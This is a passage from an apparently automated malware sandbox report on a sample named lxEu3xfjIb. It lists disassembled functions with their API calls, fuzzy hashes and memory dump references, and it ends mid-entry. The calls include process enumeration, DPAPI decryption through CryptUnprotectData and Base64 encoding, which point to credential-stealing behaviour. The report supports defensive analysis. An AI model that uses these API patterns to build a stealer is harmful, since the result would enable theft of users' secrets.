                                              • API String ID: 433455689-0
                                              • Opcode ID: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                              • Instruction ID: 86904e06d8b2176c9c64a976ccfde03a0bff3dfdbaad14eca666662694c5c9fc
                                              • Opcode Fuzzy Hash: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                              • Instruction Fuzzy Hash: 9712ED719002189BEB5CFB64DCD5EED7335AF54309F404BA9990AA60A0EEB47F48CB52
                                              Function 00418810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                              • Process32First.KERNEL32(?,00000128), ref: 0041886E
                                              • Process32Next.KERNEL32(?,00000128), ref: 00418883
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • CloseHandle.KERNEL32(?), ref: 004188F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                              • String ID:
                                              • API String ID: 1066202413-0
                                              • Opcode ID: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
                                              • Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
                                              • Opcode Fuzzy Hash: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
                                              • Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5
                                              Function 00419030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptString
                                              • String ID:
                                              • API String ID: 80407269-0
                                              • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                              • Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
                                              • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                              • Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9
                                              Function 04859297 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptBinaryToStringA.CRYPT32(00000000,0484543B,40000001,00000000,00000000,?,0484543B), ref: 048592B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptString
                                              • String ID:
                                              • API String ID: 80407269-0
                                              • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                              • Instruction ID: 369b7b46f7e2bc3f1919d755422e62cc854789808d229ffb4cc54c47f1bc54ae
                                              • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                              • Instruction Fuzzy Hash: FD11FBB0604208EFDF00CF54D844FAA33A9AF89714F00AA58FD19CB260D771F9419B60
                                              Function 0484A477 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048451A5,00000000,00000000), ref: 0484A4A6
                                              • LocalAlloc.KERNEL32(00000040,?,?,?,048451A5,00000000,?), ref: 0484A4B8
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048451A5,00000000,00000000), ref: 0484A4E1
                                              • LocalFree.KERNEL32(?,?,?,?,048451A5,00000000,?), ref: 0484A4F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID:
                                              • API String ID: 4291131564-0
                                              • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                              • Instruction ID: 806137fd8be09cd558ff58c693e26ca89d90b43ff21bd5a377c707f80dd598a0
                                              • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                              • Instruction Fuzzy Hash: F011C074641208EFEB14CFA4CC95FAA77B6EB88704F208549FD159F290D7B2AA40CB50
                                              Function 0040A2B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                              • memcpy.MSVCRT(?,?,?), ref: 0040A316
                                              • LocalFree.KERNEL32(?), ref: 0040A323
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                              • String ID:
                                              • API String ID: 3243516280-0
                                              • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                              • Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
                                              • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                              • Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61
                                              Function 0484A517 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0484A53B
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 0484A55A
                                              • memcpy.MSVCRT(?,?,?), ref: 0484A57D
                                              • LocalFree.KERNEL32(?), ref: 0484A58A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                              • String ID:
                                              • API String ID: 3243516280-0
                                              • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                              • Instruction ID: 8d55bcba1077255c873603bf05d4ac5b851eaf6e994eb87a2a0d4ba7cce90ad7
                                              • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                              • Instruction Fuzzy Hash: E0118AB8A01209EFCB04DFA4D985AAEB7B5FF89300F108559FD1597350D770AA50CFA1
                                              Function 00417BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02CA5928,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02CA5928,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02CA5928,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                              • wsprintfA.USER32 ref: 00417C47
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                              • String ID:
                                              • API String ID: 362916592-0
                                              • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                              • Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
                                              • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                              • Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95
                                              Function 0484092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$GetProcAddress.$l
                                              • API String ID: 0-2784972518
                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction ID: 2b78c59b96fc82fad8d457a6a0d021f053e03ac70cdb350827c14b5a28d45c4a
                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction Fuzzy Hash: CF3158B6910609CFEB11CF99C880AAEBBF5FF49328F14454AD541E7310D7B1EA45CBA4
                                              Function 00418CF0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: SystemTimelstrcpy
                                              • String ID:
                                              • API String ID: 62757014-0
                                              • Opcode ID: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                              • Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
                                              • Opcode Fuzzy Hash: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                              • Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6
                                              Function 0041D21A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                              • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                              • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                              • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                              Function 0485D481 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(0041D1D8), ref: 0485D486
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                              • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                              • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                              • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                              Function 0486D9AB Relevance: .8, Instructions: 823COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                              • Instruction ID: d6c40d9d13792f1c9433a2dc1382a9bb71ac176a5b3618eb0724e890a4fa95f9
                                              • Opcode Fuzzy Hash: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                              • Instruction Fuzzy Hash: C282E175A00F448FD3A5CF29C880BA2B7E1BF59300F548A2ED9EB8B651EB70B545CB50
                                              Function 048AFFEF Relevance: .7, Instructions: 700COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                              • Instruction ID: b144f9d2b25ea725f48f3cf24d54d37376ecb209a950d7776c0d193cd338f0e0
                                              • Opcode Fuzzy Hash: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                              • Instruction Fuzzy Hash: BA32D671E002198FDB14CF58C8847EFB7A2BB8A314F148B29D5A9EB391D734A9458BD1
                                              Function 048882DF Relevance: .6, Instructions: 649COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                              • Instruction ID: e47c77aa1ec196dfe9c73f5d218dbb40117b9f999130da14d38534a28253b8b2
                                              • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                              • Instruction Fuzzy Hash: FE4278716046458FC725FF19C490626BBE2BF89304FA88E6ED486CB792D735F885CB81
                                              Function 048BA08F Relevance: .5, Instructions: 501COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                              • Instruction ID: 3f2227f2dd9ec2c323f77e0480198611c67a8d649559324876af354539cbbd50
                                              • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                              • Instruction Fuzzy Hash: 4D020571E0021A8FDB15CE69C8806AEB7E2AF9A344F158B2AE855F7350E771BD4187D0
                                              Function 04885B2F Relevance: .4, Instructions: 418COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                              • Instruction ID: ebe17e44fb808028ff09c3222f1f40016d2a2084f563748e66f5f9f2a12e7f02
                                              • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                              • Instruction Fuzzy Hash: BEF17BB220C6914BC71D9A1894B08BD7FD25FA9101F0E8AADFDD71F393D924EA01DB61
                                              Function 048CA76F Relevance: .4, Instructions: 415COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                              • Instruction ID: d43fd71a00ebaa0820372a669288a60e975bc08b456d153fc766c2492d6331a7
                                              • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                              • Instruction Fuzzy Hash: 5AD18673F106294BEB08CE99DC913ADB6E2E7D8350F19463ED916E7381D6B89D0187D0
                                              Function 0489AD0F Relevance: .4, Instructions: 376COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                              • Instruction ID: 88f08d199d8a42430f25441bc9c42292788ede06a30bbb55c43d03abc71e28f7
                                              • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                              • Instruction Fuzzy Hash: 82028B74E00A588FCF16CFA8C4905EDBBF6FF89310F588559E899AB355C730A951CB50
                                              Function 0489B1CF Relevance: .4, Instructions: 372COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                              • Instruction ID: e9b7ecc7f99f2dc6f466675928bc19c05528abbd5964063daf066426383291b8
                                              • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                              • Instruction Fuzzy Hash: 8C021375E00A198FCF15CF98D4809ADB7B6FF88310F258669E849AB354D731AA91CF90
                                              Function 048B9AAF Relevance: .3, Instructions: 339COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                              • Instruction ID: 4ffc0905b735c12b0e27498ea62fb4c99e9ce2ccc620fdef0523dee0e9a0ae54
                                              • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                              • Instruction Fuzzy Hash: 8AC160B6E29B914BD3138B3DD8422A5F754AFE7190F15D72FFDE472A42FB20A2814244
                                              Function 048A8040 Relevance: .3, Instructions: 302COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                              • Instruction ID: 25293528a5ac77f5ea5967dc09958c29780c52043f478568c9f7fd3af059edc0
                                              • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                              • Instruction Fuzzy Hash: E9B14B76D042599FEB11EF68C4943FEBFB2AF42304F098A59C444EB242E7B46995C7A0
                                              Function 048AA19F Relevance: .3, Instructions: 302COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                              • Instruction ID: f53aaaa815b8df75d0679c0a1cfcbed3bb5489b5187ec0b8b0956696cc90c0c5
                                              • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                              • Instruction Fuzzy Hash: F0D14670600B40CFE729CF29C484B66B7E0BB49704F148A2ED88B8BB51E7B6F455CB91
                                              Function 048711DF Relevance: .3, Instructions: 291COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                              • Instruction ID: 66120233b49f672806d450cd9193795952a0bf200dbeb9bd4269a053370752c0
                                              • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                              • Instruction Fuzzy Hash: 6BB18272A083115BD318CF25C45076BF7E2EFC8310F1ACA3EA899D7791D778E9459A82
                                              Function 04883A0F Relevance: .3, Instructions: 291COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                              • Instruction ID: ae94d9d1fac71d1f68834edc8056c26e253f1b080709607d7b8a232ca8749a60
                                              • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
